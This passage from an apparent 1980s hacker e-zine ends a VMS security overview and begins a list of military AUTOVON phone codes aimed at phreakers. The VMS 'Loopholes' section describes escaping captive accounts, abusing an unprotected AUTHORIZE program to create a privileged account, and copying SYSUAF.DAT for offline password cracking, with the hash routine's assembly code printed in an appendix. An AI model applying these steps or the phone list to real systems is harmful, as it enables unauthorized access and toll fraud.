  887.  
  888. The system manager may also enforce a minimum password length and can even
  889. impose dual passwords on accounts. If a Username with dual passwords is
  890. entered, the system will prompt for Password: twice in a row. Automatic
  891. Password expiration dates can be set, forcing users to change their
  892. passwords every so often: from once a day to once a year or never.
  893.  
  894. After the Username and Password have been entered, the system will either
  895. log the user in, or will print the familiar message,
  896.  
  897.      User Authorization Failure
  898.  
  899. and will hang up after a settable number of failures (the default is 3) if
  900. the port characteristics include DIALUP and HANGUP.
  901.  
  902.  
  903. Breakin Detection:
  904. -----------------
  905. If a hacker were trying to get into the system he could just continue to
  906. dialup and try again. But VMS has some features to discourage this too.
  907.  
  908. If breakin detection and evasion is enabled, VMS will start to get cagey.
  909. If the count of login failures from a specific source gets high enough, the
  910. system assumes a break-in is in progress. Only login failures caused by
  911. invalid Passwords are counted, NOT invalid usernames. And the attempts must
  912. be coming from one of these three sources:
  913.  
  914.      .    A specific valid Username, and (if setup this way, A specific
  915.           terminal.
  916.      .    A specific remote DECnet node and remote Username.
  917.      .    The Username of the creator of a detached process.
  918.  
  919. By default, VMS allows five failed login attempts from any one source
  920. within the time period specified. But it's not as simple as that!
  921.  
  922. Each time a failure occurs, time is added to the time period in which a
  923. certain number of failures can occur. To take an example from DEC:
  924.  
  925.      Assume the default values are in effect. LGI_BRK_LIM specifies no
  926.      more than five login failures from one source. LGI_BRK_TMO is set
  927.      for five minutes. Assume that an outsider starts sending user
  928.      names and passwords to the system. When the first password fails,
  929.      the clock starts to run and the user has four more tries in the
  930.      next five minutes. When the second attempt fails about 30 seconds
  931.      later, the user has three tries left that will be counted over
  932.      the next 9.5 minutes. When the third attempt fails 30 seconds
  933.      later, the login failure observation time has reached 22.5
  934.      minutes. As a result, the next login failure from that source
  935.      within 22.4 minutes will trigger evasive action. The system
  936.      tolerates an average rate of login failures that is the
  937.      reciprocal of the parameter LGI_BRK_TMO...
  938.  
  939.  
  940. When breakin evasion is triggered, the system will give a:
  941.      User Authorization Failure
  942. message even when a valid Username and Password are entered, giving no
  943. indication of what it is doing. Note that ONLY the Username(s) in question
  944. are treated this way: other Usernames can still log in from the same
  945. terminal even if terminal-specific breakin detection is enabled.
  946.  
  947. The length of time VMS will hide in this way is controlled by the sysgen
  948. parameter LGI_HID_TIM. But VMS doesn't hide for exactly this time. Rather,
  949. it will hide for a length of time determined by the following equation:
  950.  
  951.      Evasion time = LGI_HID_TIM * (random number between 1 and 1.5)
  952.  
  953. The parameter LGI_BRK_DISUSER can be set, and will tell VMS to permanently
  954. disable accounts rather than just hiding for a time. The system manager
  955. then has to re-enable them manually. This is a dangerous parameter to set,
  956. however, because malicious individuals could deliberately disable accounts
  957. then! If the SYSTEM account is disabled this way, it will only be allowed
  958. to login on the VAX system console.
  959.  
  960.  
  961. Security Alarms:
  962. ----------------
  963. Although breakin attempts to different Usernames don't activate VMS Breakin
  964. detection, they can trigger Security Alarms. Security Alarms can also be
  965. triggered by different types of access to specific files or memory areas.
  966. Security Alarms cause messages to be displayed on the system console, on
  967. the terminals of any user enabled as Security Operator, and in the Operator
  968. Log file.
  969.  
  970. As DEC says,
  971.      Because security auditing affects system performance, enable
  972.      security alarms only for the most important events.
  973. Damn right! If all security alarms are enabled the system will hang! It
  974. starts writing alarms about the fact it is writing alarms, ad infinitum....
  975.  
  976. Security alarms can be triggered on multiple login failures, on breakin, on
  977. successful login from given ports, on failed attempts to access files, on
  978. successful attempts to access files, etc. So even if you get privilege to
  979. override protection or to defeat it a security alarm may still be
  980. triggered.
  981.  
  982. Security alarms typically might be enabled on the AUTHORIZE program, which
  983. adds and modifies user accounts, on SYSUAF.DAT, the authorization database,
  984. on RIGHTSLIST.DAT, the access rights database, etc. and on critical
  985. database files. But many sites don't bother with them because of their
  986. inconvenience.
  987.  
  988. Accounting:
  989. ----------
  990. Besides Security Alarms, Accounting can be enabled. Accounting can show
  991. successful logins, login failures, how much resources are consumed by
  992. processes, what programs are executed, etc. Not all sites enable
  993. accounting, and not all sites enable the same amount of it. Accounting
  994. records show login failures but only show the username that attempted to
  995. login if it is a valid username.
  996.  
  997.  
  998.  
  999. File and Device Protection:
  1000. ==========================
  1001.  
  1002. UIC:
  1003. ----
  1004. The primary access protection mechanism is the UIC. This consists of a
  1005. Group and a User code, numerically represented as [nnn,nnn]. It is an Octal
  1006. number. Since VMS 4.x versions the UIC can also be expressed as [name] or
  1007. [name,name], but internally this is translated back to the old format.
  1008.  
  1009. Users, processes, files, devices, memory sections, etc. all have UICs.
  1010. Files, devices, memory sections, etc. can have access by System, Owner,
  1011. Group and World, any combination of Read, Write, Execute, Delete for each
  1012. category.
  1013.      System    are the system accounts.
  1014.      Owner     is the account(s) who's UIC is the same as that on the
  1015.                object (file, device, etc.).
  1016.      Group     are accounts with the same first UIC number.
  1017.      World     is everyone.
  1018.  
  1019. So a process with UIC [23,7] could access an object with UIC [23,4] if that
  1020. object allowed access by Group or World. The process could access an object
  1021. with UIC [25,3] only if World access was allowed, and could access objects
  1022. with UIC [23,7] if Owner, Group, or World was allowed.
  1023.  
  1024. ACL:
  1025. ----
  1026. Also, there's a protection mechanism called the ACL or Access Control List.
  1027. This is in addition to, and can override UIC protection. With ACLs an
  1028. Identifier is created, like MODEM for one or more modem ports. An ACL is
  1029. created on the port(s) desired, and in the ACL are multiple Access Control
  1030. Entries (ACEs). If one of them is:
  1031.      (Identifier=MODEM, Access=Read+Write)
  1032. for example, user who has been Granted the identifier MODEM can access
  1033. those ports. These access privileges, like UICs apply to processes in
  1034. general. Granting and managing Identifiers is done in the AUTHORIZE
  1035. program.
  1036.  
  1037.  
  1038.  
  1039. Loopholes, Ways of Defeating Security...
  1040. ========================================
  1041.  
  1042. Although VMS has great security it's often applied poorly. For one thing,
  1043. protection is often not set up properly, programs are installed with too
  1044. much privilege etc. (Programs can be installed so they have privilege when
  1045. run even if the user running them has no privilege).
  1046.  
  1047. Getting a $ prompt:
  1048. -------------------
  1049. If a hacker logs into a VMS system and finds himself trapped within
  1050. application programs the first thing he will want to do is to get out to
  1051. the normal DCL command mode from where more things can be done.
  1052.  
  1053. Hackers will try several things and you should check to make sure they
  1054. can't try these tricks on your system.
  1055.  
  1056. AllInOne:
  1057.  
  1058. In AllInOne, DEC's popular Electronic Mail and menuing Office Automation
  1059. system, typing
  1060.      $
  1061. (the dollar sign) will by default take the user to DCL level.
  1062. Typing
  1063.      ADMIN
  1064. will get the user into the AllInOne administrator menu. From there they can
  1065. create accounts with $ access.
  1066.  
  1067. AllInOne mail also has a feature where macros can be attached to mail and
  1068. executed when the mail is read. If the hacker sends a message of this type
  1069. to some user with privilege, the macro can go off in the background and
  1070. create accounts, etc. for the hacker. This feature should be disabled.
  1071.  
  1072.  
  1073. Other Captive Account tricks:
  1074.  
  1075. Holding down <Ctrl-Y> and letting it repeat for a while will often cause
  1076. accounts that are trapped in a command procedure but not marked as CAPTIVE
  1077. in the UAF to exit from the command procedure to DCL.
  1078.  
  1079. If an account has access to VAXMAIL (the MAIL command) it can often use
  1080. MAIL's SPAWN command to spawn a process with DCL access.
  1081.  
  1082. The TPU editor has a similar SPAWN command.
  1083.  
  1084. If an account is not marked CAPTIVE the user can try to add /NOCOMMAND
  1085. after the username, like the following:
  1086.  
  1087.      Username: fred/nocommand
  1088.  
  1089. This will cause the command procedure to not be executed, leaving the
  1090. hacker at a DCL $ prompt.
  1091.  
  1092. There are many more too.
  1093.  
  1094. For this reason you should mark all accounts that are supposed to be
  1095. captive as CAPTIVE using the AUTHORIZE utility.
  1096.  
  1097.  
  1098. When at the $ Prompt:
  1099. ---------------------
  1100. Since protection is often set incorrectly, hackers can take advantage and
  1101. use this to bypass security. A couple of examples will serve to show that
  1102. you must be diligent in setting the protections properly on systems you
  1103. manage.
  1104.  
  1105. If SYS$SYSTEM:AUTHORIZE.EXE is not protected, it can be run by non-
  1106. privileged users. The hacker would then run AUTHORIZE and create a new
  1107. SYSUAF.DAT file in his own directory (AUTHORIZE will do this by default if
  1108. not run in the SYS$SYSTEM directory). The hacker would add a privileged
  1109. username to the new SYSUAF.DAT, copy it back to SYS$SYSTEM:, log out, log
  1110. in again as the new privileged user, and quickly delete the new SYSUAF.DAT
  1111. so that other users don't get "Authorization Failure" messages. The hacker
  1112. would then be able to add privileged accounts to SYSUAF.DAT at his leisure.
  1113.  
  1114. Another clever idea would be for the hacker who has gained access to copy
  1115. SYSUAF.DAT to another directory and then try to find out what passwords are
  1116. in it. VMS uses a one-way encryption algorithm, but a gifted hacker will
  1117. use the same algorithm to repeatedly encrypt different passwords until he
  1118. finds ones that match. A copy of the VMS assembly language code to do this
  1119. encryption can be found in the appendix, for your information.
  1120.  
  1121. Again, setting the protection properly will keep this from happening to
  1122. your system!
  1123.  
  1124.  
  1125. Conclusion:
  1126. ===========
  1127.  
  1128. This has been a brief overview of VMS security. For more information, read
  1129. your DEC manuals. A good place to start is the handy VMS System Manager's
  1130. Manual, Order Number AA-LA00A-TE, which can be obtained from DEC Direct and
  1131. should have come with your VMS update.
  1132.  
  1133. The importance of proper security cannot be over emphasized, but if you
  1134. overdo it performance will suffer. Experiment on your system to find a good
  1135. balance. Don't ignore security or you may regret it rather intensely.
  1136.  
  1137. Appendix -- VMS assembly code for encrypting passwords:
  1138. =======================================================
  1139.  
  1140. .TITLE HPWD - hash user password
  1141. .IDENT 'V02-002'
  1142. ; Hash PassWorD:
  1143. ; Hash a password irreversibly. This is one way encryption with
  1144. ; no decryption possible.
  1145.  
  1146. ; This code was obtained by disassembling the AUTHORIZE program.
  1147. ; See the VMS microfiche for the fully commented code:
  1148. ;         e _lib$code:_lib$code+68
  1149.  
  1150. ; Input Parameters:
  1151. ;      PWDDSC    - Address of password descriptor
  1152. ;      ENCRYPT - Encryption algorithm index (byte)
  1153. ;      SALT         - Random number (word)
  1154. ;      USRDSC  - Address of username descriptor
  1155.  
  1156. ; Output Parameters:
  1157. ;      OUTDSC    - Address of encrypted output descriptor
  1158.  
  1159. OUTDSC=4
  1160. PWDDSC=OUTDSC+4
  1161. ENCRYPT=PWDDSC+4
  1162. SALT=ENCRYPT+4
  1163. USRDSC=SALT+4
  1164.  
  1165. .PSECT _LIB$CODE    RD,NOWRT,PIC,SHR,BYTE,EXE
  1166.  
  1167. ;  AUTODIN-II polynomial table used by CRC algorithm
  1168. AUTODIN:
  1169.      .LONG ^X000000000,^X01DB71064,^X03B6E20C8,^X026D930AC,^X076DC4190
  1170.      .LONG ^X06B6B51F4,^X04DB26158,^X05005713C,^X0EDB88320,^X0F00F9344
  1171.      .LONG ^X0D6D6A3E8,^X0CB61B38C,^X09B64C2B0,^X086D3D2D4,^X0A00AE278
  1172.      .LONG ^X0BDBDF21C
  1173.  
  1174. ; Purdy polynomial coefficients.  Prime, but don't need to be
  1175. Purdy_Poly:
  1176. c:
  1177.      .LONG -83,-1
  1178.      .LONG -179,-1
  1179.      .LONG -257,-1
  1180.      .LONG -323,-1
  1181.      .LONG -363,-1
  1182.  
  1183. .ENTRY    LGI$HPWD,^M<R2,R3,R4>
  1184.      MOVAQ   @outdsc(AP),R4
  1185.      MOVAQ   @4(R4),R4
  1186.      TSTB    encrypt(AP)
  1187.      BGTRU   10$
  1188.      MNEGL   #1,R0
  1189.      MOVAQ   @pwddsc(AP),R1
  1190.      CRC     autodin,R0,(R1),@4(R1)
  1191.      CLRL    R1
  1192.      MOVQ    R0,(R4)
  1193.      BRB     20$
  1194.  
  1195. 10$: CLRQ    (R4)
  1196.      MOVAQ   @pwddsc(AP),R3
  1197.      BSBB    COLLAPSE_R2
  1198.      ADDW2   salt(AP),3(R4)
  1199.      MOVAQ   @usrdsc(AP),R3
  1200.      BSBB    COLLAPSE_R2
  1201.      PUSHAQ  (R4)
  1202.      CALLS   #1,PURDY
  1203.  
  1204. 20$: MOVL    #1,R0
  1205.      RET
  1206.  
  1207.  
  1208. COLLAPSE_R2:
  1209.      MOVZWL  (R3),R0
  1210.      BEQL    20$
  1211.      MOVAL   @4(R3),R2
  1212.      PUSHR   #^M<R1,R2>
  1213.      MOVL    R0,R1
  1214. 5$:  CMPB    (R2)+,#32
  1215.      BNEQ    7$
  1216.      DECL    R1
  1217. 7$:  SOBGTR  R0,5$
  1218.      MOVL    R1,R0
  1219.      POPR    #^M<R1,R2>
  1220. 10$: BICL3   #-8,R0,R1
  1221.      ADDB2   (R2)+,(R4)[R1]
  1222.      SOBGTR  R0,10$
  1223. 20$: RSB
  1224.  
  1225. a=59
  1226. n0=1@24-3
  1227. n1=1@24-63
  1228.  
  1229.  
  1230. .ENTRY    PURDY,^M<r2,r3,r4,r5>
  1231.      MOVQ    @4(AP),-(SP)
  1232.      BSBW    PQMOD_R0
  1233.      MOVAQ   (SP),R4
  1234.      MOVAQ   PURDY_POLY,R5
  1235.      MOVQ    (R4),-(SP)
  1236.      PUSHL   #n1
  1237.      BSBB    PQEXP_R3
  1238.      MOVQ    (R4),-(SP)
  1239.      PUSHL   #n0-n1
  1240.      BSBB    PQEXP_R3
  1241.      MOVQ    (R5)+,-(SP)
  1242.      BSBW    PQADD_R0
  1243.      BSBW    PQMUL_R2
  1244.      MOVQ    (R5)+,-(SP)
  1245.      MOVQ    (R4),-(SP)
  1246.      BSBW    PQMUL_R2
  1247.      MOVQ    (R5)+,-(SP)
  1248.      BSBW    PQADD_R0
  1249.      MOVQ    (R4),-(SP)
  1250.      BSBB    PQMUL_R2
  1251.      MOVQ    (R5)+,-(SP)
  1252.      BSBW    PQADD_R0
  1253.      MOVQ    (R4),-(SP)
  1254.      BSBB    PQMUL_R2
  1255.      MOVQ    (R5)+,-(SP)
  1256.      BSBW    PQADD_R0
  1257.      BSBW    PQADD_R0
  1258.      MOVQ    (SP)+,@4(AP)
  1259.      MOVL    #1,R0
  1260.      RET
  1261.  
  1262. PQEXP_R3:
  1263.      POPR    #^M<r3>
  1264.      MOVQ    #1,-(SP)
  1265.      MOVQ    8+4(SP),-(SP)
  1266.      TSTL    8+8(SP)
  1267.      BEQL    30$
  1268. 10$: BLBC    8+8(SP),20$
  1269.      MOVQ    (SP),-(SP)
  1270.      MOVQ    8+8(SP),-(SP)
  1271.      BSBB    PQMUL_R2
  1272.      MOVQ    (SP)+,8(SP)
  1273.      CMPZV   #1,#31,8+8(SP),#0
  1274.      BEQL    30$
  1275. 20$: MOVQ    (SP),-(SP)
  1276.      BSBB    PQMUL_R2
  1277.      EXTZV   #1,#31,8+8(SP),8+8(SP)
  1278.      BRB     10$
  1279.  
  1280. 30$: MOVQ    8(SP),8+8+4(SP)
  1281.      MOVAQ   8+8+4(SP),SP
  1282.      JMP     (R3)
  1283.  
  1284. u=0
  1285. v=u+4
  1286. y=u+8
  1287. z=y+4
  1288.  
  1289. PQMOD_R0:
  1290.      POPR    #^M<R0>
  1291.      CMPL    v(SP),#-1
  1292.      BLSSU   10$
  1293.      CMPL    u(SP),#-a
  1294.      BLSSU   10$
  1295.      ADDL2   #a,u(SP)
  1296.      ADWC    #0,v(SP)
  1297. 10$: JMP     (R0)
  1298.  
  1299. PQMUL_R2:
  1300.      POPR    #^M<r1>
  1301.      MOVL    SP,R2
  1302.      PUSHL   z(R2)
  1303.      PUSHL   v(R2)
  1304.      BSBB    EMULQ
  1305.      BSBB    PQMOD_R0
  1306.      BSBB    PQLSH_R0
  1307.      PUSHL   y(R2)
  1308.      PUSHL   v(R2)
  1309.      BSBB    EMULQ
  1310.      BSBB    PQMOD_R0
  1311.      PUSHL   z(R2)
  1312.      PUSHL   u(R2)
  1313.      BSBB    EMULQ
  1314.      BSBB    PQMOD_R0
  1315.      BSBB    PQADD_R0
  1316.      BSBB    PQADD_R0
  1317.      BSBB    PQLSH_R0
  1318.      PUSHL   y(R2)
  1319.      PUSHL   u(R2)
  1320.      BSBB    EMULQ
  1321.      BSBB    PQMOD_R0
  1322.      BSBB    PQADD_R0
  1323.      MOVQ    (SP)+,Y(R2)
  1324.      MOVAQ   Y(R2),SP
  1325.      JMP     (R1)
  1326.  
  1327. EMULQ:
  1328.      EMUL    4(SP),8(SP),#0,-(SP)
  1329.      CLRL    -(SP)
  1330.      TSTL    4+8+4(SP)
  1331.      BGEQ    10$
  1332.      ADDL2   4+8+8(SP),(SP)
  1333. 10$: TSTL    4+8+8(SP)
  1334.      BGEQ    20$
  1335.      ADDL2   4+8+4(SP),(SP)
  1336. 20$: ADDL2   (SP)+,4(SP)
  1337.      MOVQ    (SP)+,4(SP)
  1338.      RSB
  1339.  
  1340. PQLSH_R0:
  1341. .ENABLE LSB
  1342.      POPR    #^M<r0>
  1343.      PUSHL   v(SP)
  1344.      PUSHL   #a
  1345.      BSBB    EMULQ
  1346.      ASHQ    #32,Y(SP),Y(SP)
  1347.      BRB     10$
  1348.  
  1349. PQADD_R0:
  1350.      POPR    #^M<R0>
  1351. 10$: ADDL2   u(SP),y(SP)
  1352.      ADWC    v(SP),z(SP)
  1353.      BLSSU   20$
  1354.      CMPL    z(SP),#-1
  1355.      BLSSU   30$
  1356.      CMPL    y(SP),#-a
  1357.      BLSSU   30$
  1358. 20$: ADDL2   #a,y(SP)
  1359.      ADWC    #0,z(SP)
  1360. 30$: MOVAQ   Y(SP),SP
  1361.      JMP     (R0)
  1362. .END
  1363.  
  1364.  
  1365. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  1366. =                 P/HUN Issue #3, Volume 2: Phile #4 of 11                    =
  1367. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  1368.  
  1369.             The Automatic Voice Network (AUTOVON) Outline PART I
  1370.             ----------------------------------------------------
  1371.                            Typed by: DareDevil
  1372.                            P/HUN Magazine Inc.
  1373.  
  1374. I am back from my long trip from London which turned out to be very intresting.
  1375. I met a couple of Hackers and Phreakers who were very willing to share
  1376. information with me. From what they say Hacking European Computers seems to be
  1377. an easy task.
  1378.  
  1379. Anyway.....
  1380. Heres something for you Silver Boxers. Hope this helps a little. The next 2
  1381. parts will continue in the later issues of P/HUN.
  1382.  
  1383.        o--------------------------------------------------------------o
  1384.             (To reach these installations from "DoD Numbers Only")
  1385.  
  1386.  
  1387.     AUTOVON Listing Information Dial "0"
  1388.     AUTOVON Access - Dail "8" Listen for the tone,then the AUTOVON Number
  1389.     ---------------------------------------------------------------------
  1390.  
  1391.                         INCOMING AUTOVON CODES
  1392.                         ----------------------
  1393.  
  1394.   COMMERCIAL                  AUTOVON  |  COMMERCIAL               AUTOVON
  1395.   -------------------------------------|-------------------------------------
  1396.   227 Exchange    287 Plus four digits |  437 Exchange   364 Plus four digits
  1397.   238  "          251      "           |  475    "       335      "
  1398.   272  "          285      "           |  490    "       356      "
  1399.   274  "          284      "           |  576    "       291      "
  1400.   282  "          292      "           |  653    "       294      "
  1401.   284  "          251      "           |  692    "       222      "
  1402.   285  "          356      "           |  693    "       223      "
  1403.   295  "          295      "           |  694    "       224      "
  1404.   325  "          221      "           |  695    "       225      "
  1405.   355  "          345      "           |  696    "       226      "
  1406.   373  "          243      "           |  697    "       227      "
  1407.   394  "          290      "           |  746    "       286      "
  1408.   427  "          291      "           |  756    "       289      "
  1409.   433  "          288      "           |  763    "       293      "
  1410.   463  "          296      "           |  767    "       297      "
  1411.   -------------------------------------+-------------------------------------
  1412.  
  1413. AUTOVON Access to The Pacific European-Carribean Area IS NOT available through
  1414. the DoD Exchanges. Theses calls must be placed through the appropriate Military
  1415. Switchboard serving your activity or by COML means.
  1416.  
  1417.                                 ALABAMA
  1418.                                 -------
  1419. Adj Gen Natl, Montgomery ........................................ 363-72XX
  1420.                                                        Oper Asst. 363-7210
  1421. Air Force Air Univ, Maxell AFB................................... 875-XXXX
  1422.                                                        Info Oper. 875-1110
  1423.                                                        Oper Asst. 436-3700
  1424. Air Natl Gd 117th Tac Recon Gp,Birmingham........................ 694-2XXX
  1425.                                                        Oper Asst. 694-2210
  1426.          187th Tac Recon Gp, Montgomery.......................... 742-9XXX
  1427.                                                        Oper Asst. 485-9210
  1428.          232nd Mob Comm Sqd,  " ................................. 485-XXXX
  1429.                                                        Oper Asst. 742-9210
  1430. Anniston Army Depot.............................................. 571-XXXX
  1431.                                                        Oper Asst. 571-1110
  1432. Army Msl Cmd, Redstone Arsl...................................... 746-XXXX
  1433.                                                        Info Oper. 746-0011
  1434. Coast Guard Avn Spt Tng Cen, Mobile.............................. 436-3635
  1435. Def Contr Admin Svcs Mgt Area, Birmingham........................ 340-1XXX
  1436.                                                        Oper Asst. 340-1000
  1437. Fort McClellan, Anniston......................................... 865-XXXX
  1438.                                                        Oper Asst. 865-1110
  1439. Gunter AFB, Montgomery........................................... 446-XXXX
  1440.                                                        Oper Asst. 446-1110
  1441. Maxwell AFB, " .................................................. 875-XXXX
  1442.                                                        Info Oper. 875-1110
  1443. Mil Tfc Mgt Cmd (MTMC) EA Mob Det Gulf Outport Mobile............ 436-3830
  1444.  Outport Mobile.................................................. 746-XXXX
  1445. Redstone Arsl,HUntsville......................................... 746-XXXX
  1446.                                                        Info Oper. 746-XXXX
  1447. U.S Property & Fiscal Ofc (USPFO) Natl Gd, Montgomery............ 363-7316
  1448.  
  1449.                                   ALASKA
  1450.                                   ------
  1451.  
  1452. Adj Gen Natl Ge, Anchorage................................... 317-626-1299
  1453. Mil Actvities , Neklason Lake................................ 317-950-1211
  1454. Alaska Switch,Neklason Lake.................................. 317-950-1211
  1455. Cmdr in C Alaska (CINCAL), Elmendorf AFB..................... 317-552-3100
  1456.                                                   Oper Assit. 317-753-2228
  1457. Coast Guard COMCOGARD 17 Hq , Juneau......................... 317-388-7XXX
  1458.                                                   Oper Assit. 317-388-7011
  1459. Coast Guard Kodiak........................................... 317-487-5XXX
  1460.                                                   Oper Assit. 317-487-5888
  1461. Def Comm Agcy,Alaskan Region(DCA-AL) Elmendorf............... 317-552-XXXX
  1462.                                                   Oper Assit. 317-552-1110
  1463.       Commander.............................................. 317-943-1212
  1464.       Def Commercial Comm Ofc,Alaska,Elmendorf AFB........... 317-552-3132
  1465. Defense Fuel Region,Elmendorf AFB............................ 317-552-3760
  1466. Eielson AFB, Fairbanks....................................... 317-37X-XXXX
  1467.                                               Info Oper Only. 317-372-1191
  1468. Elmendorf AFB,Anchorage...................................... 317-552-XXXX
  1469.                                                         Info. 317-552-1110
  1470.                                                   Oper Assit. 317-552-1110
  1471. Fed Avn Agcy - Alaskan Rdn Hg, Anchorage..................... 317-552-XXXX
  1472.                                                   Oper Assit. 317-552-1110
  1473.      Comm Con Cen............................................ 317-552-1212
  1474. Fort Greely,Delta Junction................................... 317-87X-XXXX
  1475.                                                    Info Oper. 317-872-1113
  1476.                                                   Oper Assit. 317-864-0121
  1477. Fort Wainright, Fairbanks.................................... 317-35X-XXXX
  1478.                                                    Info Oper. 317-353-9113
  1479.                                                   Oper Assit. 317-353-9121
  1480. Nav Actvities,Adak........................................... 317-592-XXXX
  1481.                                                   Oper Assit. 317-592-0111
  1482. US Property & Fiscal Ofc (USPFO) Natl Gd, Ft Richardson...... 317-862-8116
  1483.  
  1484.  
  1485.                                  ARIZONA
  1486.                                  -------
  1487.  
  1488. A Comm-Hq,Ft Huachuca........................................... 879-XXXX
  1489.                                                      Oper Assit. 879-0111
  1490.     USACC HQS EAC............................................... 626-1720
  1491. Adj Gen Natl Gd, Phoenix........................................ 853-8710
  1492. Air Natl Gd 161st Mil Airlift Gp, Phoenix....................... 853-8710
  1493.                                                      Oper Assit. 853-9210
  1494. David Monthan AFB, Tucson....................................... 361-XXXX
  1495.                                                      Oper Assit. 361-1110
  1496.     Tac Cmd Post................................................ 626-1655
  1497. Def Contr Admin Svcs Mgt Area, Phoenix.......................... 940-XXXX
  1498.                                                      Oper Assit. 940-1110
  1499. Fort Huachuca, Sierra Vista..................................... 879-XXXX
  1500.                                                      Oper Assit. 879-0001
  1501. Luke AFB,Glendale............................................... 853-XXXX
  1502.                                                      Oper Assit. 853-1110
  1503.      Cmd Post Duty Officer...................................... 727-3950
  1504.                "          ...................................... 626-1690
  1505. Marine Corps Air Sta, Yuma...................................... 951-XXXX
  1506.                                                      Oper Assit. 951-3011
  1507. Mil Acft Star & Disp Cen,Tucson................................. 361-XXXX
  1508.                                                      Oper Assit. 361-1110
  1509. Natl Gd State Maint Ofc, Phoenix................................ 853-8810
  1510. US Property & Fiscal Ofc (USPFO) Natl Gd, Phoenix............... 853-8821
  1511. Williams AFB, Chandler.......................................... 474-XXXX
  1512.                                                      Oper Assit. 474-1011
  1513. Yuma Proving Grounds............................................ 899-XXXX
  1514.                                                      Oper Assit. 899-1110
  1515.                                                     After Hours. 899-2020
  1516. 1st Cbt Eval Gp Det 2 (SAC) Holbrook............................ 626-3430
  1517.  
  1518.  
  1519.                                 ARKANSAS
  1520.                                 --------
  1521.  
  1522. Adj Gen Natl Gd, Little Rock.................................... 731-5200
  1523. Air Natl Gd 188th Tac Recon Gp, Ft Smith........................ 962-8XXX
  1524. Blytheville AFB................................................. 721-XXXX
  1525.                                                      Oper Assit. 721-1110
  1526. Fort Chaffee,Ft Smith........................................... 962-2XXX
  1527.                                                      Oper Assit. 962-2111
  1528. Little Rock AFB................................................. 731-XXXX
  1529.                                                      Oper Assit. 731-1110
  1530. Pine Bluff Arsl................................................. 966-3XXX
  1531.                                                      Oper Assit. 966-3798
  1532. US Property & Fiscal Ofc(USPFO) Natl Gd,Little Rock............. 731-5253
  1533.  
  1534.                               CALIFORNIA
  1535.                               ----------
  1536.  
  1537. Adj Gen Natl Gd, Sacramento..................................... 466-6531
  1538. Air Force Aero Sta, McClelland AFB.............................. 730-3760
  1539. Air Force Contr Mgr Div AFSC, Los Angeles AFS................... 833-1837
  1540.                                                      Oper Assit. 833-1110
  1541. Air Force Flt Test Cen,AFSC, Edwards AFB........................ 527-XXXX
  1542.                                                      Oper Assit. 527-0111
  1543. Air Force Satl Comm Fac Hq, Los Angeles......................... 833-XXXX
  1544.                                                      Oper Assit. 833-1110
  1545. Air Force Satl Test Ctr, Sunnyvale.............................. 359-3XXX
  1546.                                                      Oper Assit. 359-3110
  1547.               144th Air Def Wg, Fresno.......................... 949-9XXX
  1548.                                                      Oper Assit. 949-9210
  1549.               146th Mil Airlift Wg, Van Nuys.................... 873-6XXX
  1550.                                                      Oper Assit. 873-6310
  1551.               148th Comm Sqd, Compton........................... 898-1895
  1552.               149th Comm Sqd, Highlands......................... 633-2582
  1553.               162nd Comm Gp, N Highlands........................ 633-2582
  1554.               216 Equip & Inst Squd, Hayward.................... 462-5637
  1555.               222nd Mob Comm Sqd, Costa Mesa.................... 833-0459
  1556.               234th Mob Comm Sqd, Hayward....................... 462-1746
  1557. America Forces Radio & TV Svc, Los Angeles...................... 898-1746
  1558. Armed Forces Reserve Ctr, Los Angeles........................... 972-8XXX
  1559.                                                      Oper Assit. 972-8011
  1560. Army Audit Agcy Western Region, Sacramento...................... 839-2241
  1561.                                                      Oper Assit. 839-1110
  1562. Ballistic Sys Div Af Sys Cmd, Norton AFB........................ 876-XXXX
  1563.                                                      Oper Assit. 876-1110
  1564. Beale AFB, Marsville............................................ 368-XXXX
  1565.                                                      Oper Assit. 368-1110
  1566. Camp Pendelton Marine Corps Base,Oceanside...................... 365-XXXX
  1567.                                                      Oper Assit. 365-0111
  1568. Castle AFB, Merced.............................................. 347-XXXX
  1569.                                                      Oper Assit. 347-1110
  1570. Centerville Beach Nav Fac, Ferndale............................. 896-3381
  1571. Coast Guard COMCOGARD 11 Hq, Long Beach......................... 360-7961
  1572.               12 Hq,(RCC Only), San Francisco................... 730-3471
  1573. Montery......................................................... 629-1561
  1574. Cmdr Submarine Flottilla Five, San Diego........................ 933-XXXX
  1575.                                                      Oper Assit. 933-1011
  1576. Def Conrt Admin Svcs Reg Svcs Reg/Mgt Area, Los Angeles......... 833-XXXX
  1577.                                                       Info Oper. 833-2226
  1578.                                                      Oper Assit. 833-1110
  1579. Def Contr Admin Svcs Mgt Area, Santa Ana........................ 873-2XXX
  1580.                                                      Oper Assit. 873-2700
  1581.              San Diego.......................................... 542-XXXX
  1582.                                                      Oper Assit. 524-0111
  1583.              Van Nuys........................................... 972-3XXX
  1584.                                                       Info Oper. 972-3319
  1585.              San Francisco...................................... 466-9XXX
  1586.                                                       Info Oper. 466-9500
  1587. Defense Depot, Tracy............................................ 462-9XXX
  1588.                                                      Oper Assit. 462-9110
  1589. Def Fuel Region West San Pedro.................................. 833-2876
  1590. Def Language Institute, Presidio of Monterey.................... 929-XXXX
  1591.                                                      Oper Assit. 929-1110
  1592. Def Pers Spt Cen, Alameda....................................... 686-3006
  1593. Def Manpower Data Center, Monterey.............................. 878-2951
  1594. Edwards AFB..................................................... 527-XXXX
  1595.                                                       Info Oper. 527-0111
  1596. FAA Los Angeles Air Rt Trc Con Cen, Palmdale.................... 898-1290
  1597. FAA Oakland Air Rt Trf Con Cen, Fremont......................... 730-1595
  1598. Flt Air Con & Surv Fac (FACSFAC) TCC/OC Only, San Diego......... 727-3925
  1599. Flt Anal Cen, Corona............................................ 933-XXXX
  1600.                                                      Oper Assit. 933-0111
  1601. Flt Anti-Sub Warefare Sch, San Diego............................ 524-XXXX
  1602.                                                      Oper Assit. 524-0111
  1603. Fort Irwin, Barstow............................................. 470-XXXX
  1604.                                                      Oper Assit. 470-0111
  1605. Fort Mason, San Francisco....................................... 586-XXXX
  1606.                                                      Oper Assit. 586-1110
  1607. Fort Ord, Monterey.............................................. 929-XXXX
  1608.                                                      Oper Assit. 929-1110
  1609. George AFB, Victorville......................................... 353-XXXX
  1610.                                                      Oper Assit. 353-1110
  1611. German Mil Rep to USA/Cent Area, Long Beach NS.................. 360-0111
